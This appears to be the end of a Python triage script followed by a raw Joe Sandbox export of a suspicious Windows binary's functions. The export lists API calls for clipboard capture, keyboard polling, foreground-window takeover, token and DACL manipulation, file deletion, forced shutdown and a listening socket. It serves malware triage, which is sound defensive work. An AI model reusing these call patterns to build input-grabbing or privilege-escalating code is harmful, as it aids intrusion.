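• OpenClipboard.USER32(0044DC00), ref: 00406B36
• GetClipboardData.USER32(0000000D), ref: 00406B4C
• GlobalLock.KERNEL32(00000000), ref: 00406B74
• CloseClipboard.USER32 ref: 00406CF6
Similarity
• String ID:
APIs
• GetForegroundWindow.USER32(00000000,00000000), ref: 003CEB4A
• FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00423AEA
• SetForegroundWindow.USER32(000000FF), ref: 00423B0A
• AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 00423B44
• keybd_event.USER32(00000012,00000000), ref: 00423B77
• String ID: Shell_TrayWnd
APIs
  • Part of subcall function 003EB134: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 003EB1AD
• DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?), ref: 003EAD5A
• OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 003EAD82
• OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 003EADBF
• String ID: $H*F$default$winsta0
"""

if __name__ == "__main__":
    for idx, rule, strings in triage(parse_records(SAMPLE)):
        print(f"record {idx}: {rule} (String ID: {strings!r})")
```

Run it against the plain-text export of the report to get a short list of function records worth opening first; `api_sequence` gives the call order of one record so the foreground-takeover or clipboard sequence can be checked by eye, and `apis(include_subcalls=False)` restricts a rule to calls made directly by the function when the callee attribution is too noisy.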
                                                                                APIs
                                                                                • FindFirstFileW.KERNEL32(?,?,75568FB0,?,00000000), ref: 00401CAB
                                                                                • _wcscmp.LIBCMT ref: 00401CC0
                                                                                • _wcscmp.LIBCMT ref: 00401CD7
                                                                                  • Part of subcall function 003F6BD4: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 003F6BEF
                                                                                • FindNextFileW.KERNEL32(00000000,?), ref: 00401D06
                                                                                • FindClose.KERNEL32(00000000), ref: 00401D11
                                                                                • FindFirstFileW.KERNEL32(*.*,?), ref: 00401D2D
                                                                                • _wcscmp.LIBCMT ref: 00401D54
                                                                                • _wcscmp.LIBCMT ref: 00401D6B
                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00401D7D
                                                                                • SetCurrentDirectoryW.KERNEL32(004639FC), ref: 00401D9B
                                                                                • FindNextFileW.KERNEL32(00000000,00000010), ref: 00401DA5
                                                                                • FindClose.KERNEL32(00000000), ref: 00401DB2
                                                                                • FindClose.KERNEL32(00000000), ref: 00401DC2
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                                                • String ID: *.*
                                                                                • API String ID: 1824444939-438819550
                                                                                • Opcode ID: 2da1ae49b79a6830b2eb3fa6454399b5c7a50efca71587a7d7836ad1ea2539f4
                                                                                • Instruction ID: 2972447949fe614fe8a1904c1d6f1a53954351dab762c03f9b80ded8e2d2acdb
                                                                                • Opcode Fuzzy Hash: 2da1ae49b79a6830b2eb3fa6454399b5c7a50efca71587a7d7836ad1ea2539f4
                                                                                • Instruction Fuzzy Hash: 2131D23290461A6BDF15AFA0EC49ADE37AD9F45320F100567E801B22E0DB78EA458A6C
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: _memset
                                                                                • String ID: Q\E$[$[:<:]]$[:>:]]$\$\$\$\b(?<=\w)$\b(?=\w)$]$^
                                                                                • API String ID: 2102423945-2023335898
                                                                                • Opcode ID: d262a727b186f1273deb8a2558be7c6502604c6161217ee5feb8d982e467bed5
                                                                                • Instruction ID: 14558b60e159d3c085bd79c1bd17a10cf6d530ad437c08f6e6f8cd1635b94c32
                                                                                • Opcode Fuzzy Hash: d262a727b186f1273deb8a2558be7c6502604c6161217ee5feb8d982e467bed5
                                                                                • Instruction Fuzzy Hash: 0482E171E04229CBCB25CF94C8806EEBBB5FF88314F65816AD915AB741E7349E85CB84
                                                                                APIs
                                                                                • GetLocalTime.KERNEL32(?), ref: 004009DF
                                                                                • SystemTimeToFileTime.KERNEL32(?,?), ref: 004009EF
                                                                                • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 004009FB
                                                                                • __wsplitpath.LIBCMT ref: 00400A59
                                                                                • _wcscat.LIBCMT ref: 00400A71
                                                                                • _wcscat.LIBCMT ref: 00400A83
                                                                                • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00400A98
                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00400AAC
                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00400ADE
                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00400AFF
                                                                                • _wcscpy.LIBCMT ref: 00400B0B
                                                                                • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00400B4A
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
                                                                                • String ID: *.*
                                                                                • API String ID: 3566783562-438819550
                                                                                • Opcode ID: 80a195bcb199126bb159121a070eb13a08f7d849d382edc4000f471ab357a2e2
                                                                                • Instruction ID: dba81efda2102943cc169c54340d266f481e7765ad546e2079ec548443b5a5ea
                                                                                • Opcode Fuzzy Hash: 80a195bcb199126bb159121a070eb13a08f7d849d382edc4000f471ab357a2e2
                                                                                • Instruction Fuzzy Hash: 756179B25042059FC710EF60C840AAFB3E8FF89314F04492EFA89DB251EB35E905CB96
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: E$672ff0652ff0612ff0652ff0682ff06b2ff0652ff0652ff06f2ff06c2ff0682ff06b2ff0642ff0652ff06e2ff0642ff0602ff06f2ff06b2ff0672ff0602ff06c2f$ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)$EEE E
                                                                                • API String ID: 0-3166662482
                                                                                • Opcode ID: 83170dfb56aa102d667b71f885b6444a09998db664822b960e784a12be9c9749
                                                                                • Instruction ID: 19ce1e9bbfe4f7959f7d68d5246befa050a0a507c824158a28e9cd65950e271f
                                                                                • Opcode Fuzzy Hash: 83170dfb56aa102d667b71f885b6444a09998db664822b960e784a12be9c9749
                                                                                • Instruction Fuzzy Hash: A5729D71E042198BDF25CF59C8817EEB7B5FF48314F10816AE909EB780EB749A41DB94
                                                                                APIs
                                                                                  • Part of subcall function 003EABBB: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 003EABD7
                                                                                  • Part of subcall function 003EABBB: GetLastError.KERNEL32(?,003EA69F,?,?,?), ref: 003EABE1
                                                                                  • Part of subcall function 003EABBB: GetProcessHeap.KERNEL32(00000008,?,?,003EA69F,?,?,?), ref: 003EABF0
                                                                                  • Part of subcall function 003EABBB: HeapAlloc.KERNEL32(00000000,?,003EA69F,?,?,?), ref: 003EABF7
                                                                                  • Part of subcall function 003EABBB: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 003EAC0E
                                                                                  • Part of subcall function 003EAC56: GetProcessHeap.KERNEL32(00000008,003EA6B5,00000000,00000000,?,003EA6B5,?), ref: 003EAC62
                                                                                  • Part of subcall function 003EAC56: HeapAlloc.KERNEL32(00000000,?,003EA6B5,?), ref: 003EAC69
                                                                                  • Part of subcall function 003EAC56: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,003EA6B5,?), ref: 003EAC7A
                                                                                • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 003EA6D0
                                                                                • _memset.LIBCMT ref: 003EA6E5
                                                                                • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 003EA704
                                                                                • GetLengthSid.ADVAPI32(?), ref: 003EA715
                                                                                • GetAce.ADVAPI32(?,00000000,?), ref: 003EA752
                                                                                • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 003EA76E
                                                                                • GetLengthSid.ADVAPI32(?), ref: 003EA78B
                                                                                • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 003EA79A
                                                                                • HeapAlloc.KERNEL32(00000000), ref: 003EA7A1
                                                                                • GetLengthSid.ADVAPI32(?,00000008,?), ref: 003EA7C2
                                                                                • CopySid.ADVAPI32(00000000), ref: 003EA7C9
                                                                                • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 003EA7FA
                                                                                • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 003EA820
                                                                                • SetUserObjectSecurity.USER32(?,00000004,?), ref: 003EA834
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                                • String ID:
                                                                                • API String ID: 3996160137-0
                                                                                • Opcode ID: f6981265833a66777ac0dd2e39202964433482fd657a6a91e53ab355fba16c02
                                                                                • Instruction ID: 5e4d825555cfad9708fcf62511927d6512dbb8b3ec3264b92143d712ed489b57
                                                                                • Opcode Fuzzy Hash: f6981265833a66777ac0dd2e39202964433482fd657a6a91e53ab355fba16c02
                                                                                • Instruction Fuzzy Hash: 57515D71900659AFDF05DFA6DC44AEEBBB9FF04704F048229F911AB290D734AE05CB61
                                                                                APIs
                                                                                  • Part of subcall function 003F6EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,003F5FA6,?), ref: 003F6ED8
                                                                                  • Part of subcall function 003F72CB: GetFileAttributesW.KERNEL32(?,003F6019), ref: 003F72CC
                                                                                • _wcscat.LIBCMT ref: 003F6441
                                                                                • __wsplitpath.LIBCMT ref: 003F645F
                                                                                • FindFirstFileW.KERNEL32(?,?), ref: 003F6474
                                                                                • _wcscpy.LIBCMT ref: 003F64A3
                                                                                • _wcscat.LIBCMT ref: 003F64B8
                                                                                • _wcscat.LIBCMT ref: 003F64CA
                                                                                • DeleteFileW.KERNEL32(?), ref: 003F64DA
                                                                                • FindNextFileW.KERNEL32(00000000,00000010), ref: 003F64EB
                                                                                • FindClose.KERNEL32(00000000), ref: 003F6506
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: File$Find_wcscat$AttributesCloseDeleteFirstFullNameNextPath__wsplitpath_wcscpy
                                                                                • String ID: \*.*$p1Wu`KXu
                                                                                • API String ID: 2643075503-2866000061
                                                                                • Opcode ID: 7f6a224a5e51a3a5e31a88ac8ef14bf847f9526593ef9d8340bfe88ebf733995
                                                                                • Instruction ID: 29d67ebfb134fa782179f3b6d1bd0b9c50fcd211a704cd32eeb828b24b60a5dd
                                                                                • Opcode Fuzzy Hash: 7f6a224a5e51a3a5e31a88ac8ef14bf847f9526593ef9d8340bfe88ebf733995
                                                                                • Instruction Fuzzy Hash: BA3184B2408388AAC722EBA49885AEF77DCAF56310F44092FF6D9C7141EA35D5098767
                                                                                APIs
                                                                                  • Part of subcall function 00413C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00412BB5,?,?), ref: 00413C1D
                                                                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0041328E
                                                                                  • Part of subcall function 003B936C: __swprintf.LIBCMT ref: 003B93AB
                                                                                  • Part of subcall function 003B936C: __itow.LIBCMT ref: 003B93DF
                                                                                • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0041332D
                                                                                • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 004133C5
                                                                                • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00413604
                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 00413611
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                                                • String ID:
                                                                                • API String ID: 1240663315-0
                                                                                • Opcode ID: d6824488bde82a72f23944343c281861de9251ae22047ddee049a4ba5ca8f82e
                                                                                • Instruction ID: 9567d000dc0440853b50f7ee138722ed656c7d7b4fd40bb0ec949baa41021375
                                                                                • Opcode Fuzzy Hash: d6824488bde82a72f23944343c281861de9251ae22047ddee049a4ba5ca8f82e
                                                                                • Instruction Fuzzy Hash: F8E16A35604200AFCB15DF28C991EABBBE9EF88714B04846EF54ADB261DB34ED41CB56
                                                                                APIs
                                                                                • GetKeyboardState.USER32(?), ref: 003F2B5F
                                                                                • GetAsyncKeyState.USER32(000000A0), ref: 003F2BE0
                                                                                • GetKeyState.USER32(000000A0), ref: 003F2BFB
                                                                                • GetAsyncKeyState.USER32(000000A1), ref: 003F2C15
                                                                                • GetKeyState.USER32(000000A1), ref: 003F2C2A
                                                                                • GetAsyncKeyState.USER32(00000011), ref: 003F2C42
                                                                                • GetKeyState.USER32(00000011), ref: 003F2C54
                                                                                • GetAsyncKeyState.USER32(00000012), ref: 003F2C6C
                                                                                • GetKeyState.USER32(00000012), ref: 003F2C7E
                                                                                • GetAsyncKeyState.USER32(0000005B), ref: 003F2C96
                                                                                • GetKeyState.USER32(0000005B), ref: 003F2CA8
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: State$Async$Keyboard
                                                                                • String ID:
                                                                                • API String ID: 541375521-0
                                                                                • Opcode ID: 37f62140c04aa1622f48f806e6591c5beca48661d70a37053ce26a39ef7e328d
                                                                                • Instruction ID: 8b1f1b703841ac4ea613a24ead17e2bb8deb37694b7d75035247f10202c1e4f2
                                                                                • Opcode Fuzzy Hash: 37f62140c04aa1622f48f806e6591c5beca48661d70a37053ce26a39ef7e328d
                                                                                • Instruction Fuzzy Hash: BB41B6349047CDADFF369B6489047BBBEA0AF11344F058059DBC6572C2DBA49DC8C7A2
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                                • String ID:
                                                                                • API String ID: 1737998785-0
                                                                                • Opcode ID: 3a988fcb159171194b7fbddc50fd56143c123dcd847c030beeb73f8ab46c4ba7
                                                                                • Instruction ID: c38898922708f105d4fd600fe9efa7d85c2e4134e8421790fd19185e71cd5272
                                                                                • Opcode Fuzzy Hash: 3a988fcb159171194b7fbddc50fd56143c123dcd847c030beeb73f8ab46c4ba7
                                                                                • Instruction Fuzzy Hash: AC21A4317002149FDB11AF68ED4AF6E77A8FF44711F05802AF91ADB2A1DB34ED118B59
                                                                                APIs
                                                                                  • Part of subcall function 003E9ABF: CLSIDFromProgID.OLE32 ref: 003E9ADC
                                                                                  • Part of subcall function 003E9ABF: ProgIDFromCLSID.OLE32(?,00000000), ref: 003E9AF7
                                                                                  • Part of subcall function 003E9ABF: lstrcmpiW.KERNEL32(?,00000000), ref: 003E9B05
                                                                                  • Part of subcall function 003E9ABF: CoTaskMemFree.OLE32(00000000,?,00000000), ref: 003E9B15
                                                                                • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 0040C235
                                                                                • _memset.LIBCMT ref: 0040C242
                                                                                • _memset.LIBCMT ref: 0040C360
                                                                                • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000001), ref: 0040C38C
                                                                                • CoTaskMemFree.OLE32(?), ref: 0040C397
                                                                                Strings
                                                                                • NULL Pointer assignment, xrefs: 0040C3E5
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                                                                • String ID: NULL Pointer assignment
                                                                                • API String ID: 1300414916-2785691316
                                                                                • Opcode ID: 8e29d4ec688426566b3a737d56d357c6ba5bb22af5619073497c2cbaa1df0465
                                                                                • Instruction ID: eb98e658c4fc2b0b0fde6d4425ce8c21db3ba1e95fce0249f5fd849a0d180bda
                                                                                • Opcode Fuzzy Hash: 8e29d4ec688426566b3a737d56d357c6ba5bb22af5619073497c2cbaa1df0465
                                                                                • Instruction Fuzzy Hash: E8914B71D00218EBDB11DF94DC81EDEBBB9AF04710F10812AF915BB281DB746A45CFA4
                                                                                APIs
                                                                                  • Part of subcall function 003EB134: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 003EB180
                                                                                  • Part of subcall function 003EB134: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 003EB1AD
                                                                                  • Part of subcall function 003EB134: GetLastError.KERNEL32 ref: 003EB1BA
                                                                                • ExitWindowsEx.USER32(?,00000000), ref: 003F7A0F
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                                • String ID: $@$SeShutdownPrivilege
                                                                                • API String ID: 2234035333-194228
                                                                                • Opcode ID: 0d1ec88b0d9bc404d681a59b7b708ff190e14f9551d950cf486d7404ba889a92
                                                                                • Instruction ID: de5654a5a314c3d0f69cd852c17a04def2795cf7a6e51d2d83f93718b988bdff
                                                                                • Opcode Fuzzy Hash: 0d1ec88b0d9bc404d681a59b7b708ff190e14f9551d950cf486d7404ba889a92
                                                                                • Instruction Fuzzy Hash: 8701FC716582196AFF2A16749C4AFBF725C9704740F271534FF03A61D2E5A15E0081B4
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 672ff0652ff0612ff0652ff0682ff06b2ff0652ff0652ff06f2ff06c2ff0682ff06b2ff0642ff0652ff06e2ff0642ff0602ff06f2ff06b2ff0672ff0602ff06c2f$ERCP$VUUU$VUUU$VUUU$VUUU$E
                                                                                • API String ID: 0-2650188446
                                                                                • Opcode ID: d06822cbe3edaadf731b2d97e676ecf0151c37a05b18dea2826692b3d92e7de3
                                                                                • Instruction ID: 3cc347739be248e7121bb757aec14896081a85de0140271b7159ff32c4ea45a2
                                                                                • Opcode Fuzzy Hash: d06822cbe3edaadf731b2d97e676ecf0151c37a05b18dea2826692b3d92e7de3
                                                                                • Instruction Fuzzy Hash: F7928C71E00619CBDF25CF58C8807EEB7B1BB58318F15819AEA16ABB80D7349D81CF95
                                                                                APIs
                                                                                • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00408CA8
                                                                                • WSAGetLastError.WSOCK32(00000000), ref: 00408CB7
                                                                                • bind.WSOCK32(00000000,?,00000010), ref: 00408CD3
                                                                                • listen.WSOCK32(00000000,00000005), ref: 00408CE2
                                                                                • WSAGetLastError.WSOCK32(00000000), ref: 00408CFC
                                                                                • closesocket.WSOCK32(00000000,00000000), ref: 00408D10
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorLast$bindclosesocketlistensocket
                                                                                • String ID:
                                                                                • API String ID: 1279440585-0
                                                                                • Opcode ID: b1ec0fbc8c470ba9840c30d8fddd23a621c6867ada39b5d1ca72dcdecfbeb54c
                                                                                • Instruction ID: 7f2ac9b798f905723a91a311a4843e66de34a91d3e450eb4c5e033f571077383
                                                                                • Opcode Fuzzy Hash: b1ec0fbc8c470ba9840c30d8fddd23a621c6867ada39b5d1ca72dcdecfbeb54c
